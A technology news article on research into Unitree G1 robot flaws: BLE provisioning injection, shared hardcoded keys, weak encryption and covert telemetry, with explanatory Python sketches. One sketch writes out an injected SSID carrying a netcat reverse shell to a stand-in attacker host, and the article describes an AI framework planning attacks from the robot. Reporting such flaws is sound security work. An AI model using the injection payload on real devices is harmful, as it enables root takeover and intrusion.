Categories: Technology / Cybersecurity

Humanoid Robot Security Crisis: Unitree G1 Exposes Bluetooth and Data Leaks

Overview: A humanoid under threat

A new wave of research reveals that the Unitree G1 humanoid robot is vulnerable to a Bluetooth Low Energy (BLE) attack that can grant attackers root access, enabling covert surveillance and potentially harmful cyber operations. Alias Robotics' analysis traces a chain of weaknesses, from setup provisioning to encryption and data channels, that together make an unpatched G1 a potent tool for espionage and intrusion.

Exploiting the setup: BLE provides the entry point

The core issue lies in how the robot handles its initial setup over BLE. During Wi-Fi provisioning, the G1 uses BLE to receive the network name and password. The data pathway lacks robust input filtering, and all Unitree G1 units (along with other models from the same company) share a single hardcoded AES key. This combination enables anyone within BLE range to inject commands and gain root access via the provisioning daemon. In short, proximity plus universal credentials can unlock remote control of the robot.
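The injection risk described above can be sketched with a hypothetical provisioning routine. The function name, command, and payload below are illustrative stand-ins, not Unitree's actual code; the point is the vulnerability class: attacker-controlled Wi-Fi credentials interpolated into a privileged command without input filtering.

```python
# Hypothetical sketch of the vulnerability class: a provisioning daemon
# that interpolates an attacker-supplied SSID into a shell command with
# no sanitization. All names here are illustrative, not Unitree's code.

def build_wifi_command(ssid: str, password: str) -> str:
    # Vulnerable: the daemon runs as root and applies no input filtering
    return f'nmcli dev wifi connect "{ssid}" password "{password}"'

# A benign provisioning request
print(build_wifi_command("HomeWiFi", "hunter2"))

# A malicious "SSID" smuggles a shell command into the string; if the
# daemon hands this to a shell, the payload runs with root privileges.
payload = '"; nc -e /bin/sh attacker.local 4444; echo "'
print(build_wifi_command(payload, "x"))
```

Because the provisioning payload is also protected only by a key shared across all units, any attacker in BLE range can produce a validly encrypted message carrying such an injection.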

Impact of a shared key

Once an attacker breaches provisioning, they can alter credentials or add remote accounts, effectively maintaining control over the device. The use of a single, hardcoded key across all hardware amplifies the risk, turning a local vulnerability into a widespread threat vector for fleets of robots.

Encryption weaknesses: two layers, two flaws

Alias Robotics’ analysis also scrutinizes the robot’s configuration protections. The outer encryption layer relies on Blowfish in ECB mode, which encrypts identical plaintext blocks to identical ciphertext blocks and so leaks structural patterns, a long-known weakness. More alarmingly, every Unitree G1 uses the same 128-bit key, meaning that cracking one robot’s data can unlock all others. This key was extracted directly from the robot’s software, undermining the confidentiality of the entire fleet.
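A toy example shows why a mode that repeats patterns leaks information even when the cipher itself is sound. The XOR "cipher" and key below are stand-ins for the robot's actual Blowfish implementation; the leak demonstrated is a property of the mode, not of the cipher.

```python
# Toy demonstration of the ECB-style pattern leak: identical plaintext
# blocks encrypt to identical ciphertext blocks. A simple XOR "cipher"
# stands in for Blowfish here.

KEY = bytes.fromhex("deadbeefcafebabe")  # illustrative shared 8-byte key

def toy_encrypt_block(block: bytes) -> bytes:
    # Stand-in for a real 64-bit block cipher such as Blowfish
    return bytes(b ^ k for b, k in zip(block, KEY))

def ecb_encrypt(data: bytes) -> bytes:
    # Each 8-byte block is encrypted independently: the hallmark of ECB
    assert len(data) % 8 == 0
    return b"".join(toy_encrypt_block(data[i:i + 8])
                    for i in range(0, len(data), 8))

config = b"PASSWORDPASSWORDSETTINGS"  # two identical 8-byte blocks
ct = ecb_encrypt(config)

# The repeated plaintext block yields a repeated ciphertext block, so an
# eavesdropper learns structure without ever recovering the key.
print(ct[0:8] == ct[8:16])  # → True
```

Combined with a fleet-wide shared key, this means one extracted key plus visible ciphertext structure is enough to read any unit's configuration.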

The inner layer adds a Linear Congruential Generator (LCG) for a pseudo-random transformation. Although researchers reconstructed the LCG logic, the seed space is limited to 32 bits, making brute-force recovery feasible. Together, these layers expose configuration files—containing service settings, process names, and network details—to anyone who can decrypt them.
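A minimal sketch shows why a small seed space dooms an LCG-derived keystream. The constants and seed below are illustrative glibc-style values, not the parameters recovered from the firmware, and the search range is reduced so the demo runs in seconds; a full 2**32 sweep is routine work for parallel hardware.

```python
# Brute-forcing an LCG seed from a few observed keystream bytes.
# Constants are illustrative glibc-style values, not the firmware's.

A, C, M = 1103515245, 12345, 2**31  # illustrative LCG parameters

def keystream(seed: int, n: int) -> list[int]:
    x, out = seed, []
    for _ in range(n):
        x = (A * x + C) % M
        out.append((x >> 23) & 0xFF)  # high byte of the 31-bit state
    return out

secret_seed = 41_222
# Attacker observes a few keystream bytes, e.g. via the known-plaintext
# header of a configuration file.
observed = keystream(secret_seed, 6)

# Exhaustive search over a deliberately reduced seed space for the demo
matches = [s for s in range(2**16) if keystream(s, 6) == observed]
print(secret_seed in matches)  # → True
```

In practice a handful of known-plaintext bytes pins the seed down to one or very few candidates, after which the entire pseudo-random transformation unravels.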

Data exfiltration: unapproved transmissions to foreign servers

Traffic analysis shows the G1 continuously transmits data to servers in China. Battery status, joint torque, motion state, and sensor data from cameras, microphones, and internal services are sent as JSON packets every five minutes to two ports (one of them 17883). A live WebSocket session to a third server runs over SSL without certificate verification, enabling ongoing, potentially sensitive exchanges that could include voice or video data. Users are not informed of these transfers, and there is no opt-out mechanism.
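For contrast, the snippet below shows what client-side "SSL without certificate verification" looks like, using Python's standard ssl module as a generic illustration rather than the robot's actual client code. A client configured this way accepts any server that completes a TLS handshake, so an attacker on the network path can impersonate the telemetry endpoint.

```python
import ssl

# Insecure client configuration: the peer's identity and certificate
# chain are never checked, so any on-path attacker can impersonate the
# server and read or alter the stream.
insecure = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
insecure.check_hostname = False        # peer identity ignored
insecure.verify_mode = ssl.CERT_NONE   # certificate chain not validated

# A properly configured client pins trust to a CA bundle instead:
secure = ssl.create_default_context()
print(secure.verify_mode == ssl.CERT_REQUIRED)  # → True
```

Note that `check_hostname` must be disabled before `verify_mode` can be set to `CERT_NONE`; the secure default deliberately resists this misconfiguration.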

From a regulatory perspective, such behavior may breach GDPR provisions in Europe (Articles 6 and 13) and California privacy laws in the U.S. that require explicit consent for data tracking. The absence of visible indicators compounds the privacy risk.

System architecture: many doors, few protections

The robot’s internal network runs several communication systems: DDS/RTPS for internal sensor-actuator messaging, and MQTT and WebRTC for cloud connectivity and remote control. Alarmingly, DDS traffic is unencrypted, so anyone on the local network can eavesdrop. WebRTC’s TLS checks are disabled on the client side, allowing anyone with network access to impersonate legitimate services. Combine BLE exposure, weak encryption, and unsecured cloud channels, and the G1 presents multiple pathways for attackers to move laterally across its systems.

From surveillance to offensive capability: two case studies

Researchers demonstrated a dual-use scenario. First, the robot can act as a covert surveillance device, automatically linking to telemetry servers and transmitting audio, video, and spatial data from its sensors. A unit placed in an office or lab could map the facility and relay information covertly. Second, the team showed an autonomous-attack possibility by installing a cybersecurity AI framework that conducts reconnaissance, vulnerability scanning, and exploitation planning. It identified open channels and confirmed the ability to inject commands via the same BLE flaw, potentially exploiting OTA updates and cloud paths. While the researchers stopped short of executing live attacks, the study confirms that a compromised robot could pivot from data collection to intrusion against other networked devices.

Lessons for the robotics industry

The findings underscore a need for a paradigm shift in robot security. Static defenses and one-off audits are insufficient when devices combine software, sensors, and wireless connectivity. The authors advocate for adaptive security systems powered by cybersecurity AI that can detect and counter threats automatically, more robust provisioning protocols, and encryption standards that do not rely on shared keys. Only with a holistic, proactive security approach can humanoid robots earn trust in real-world deployments.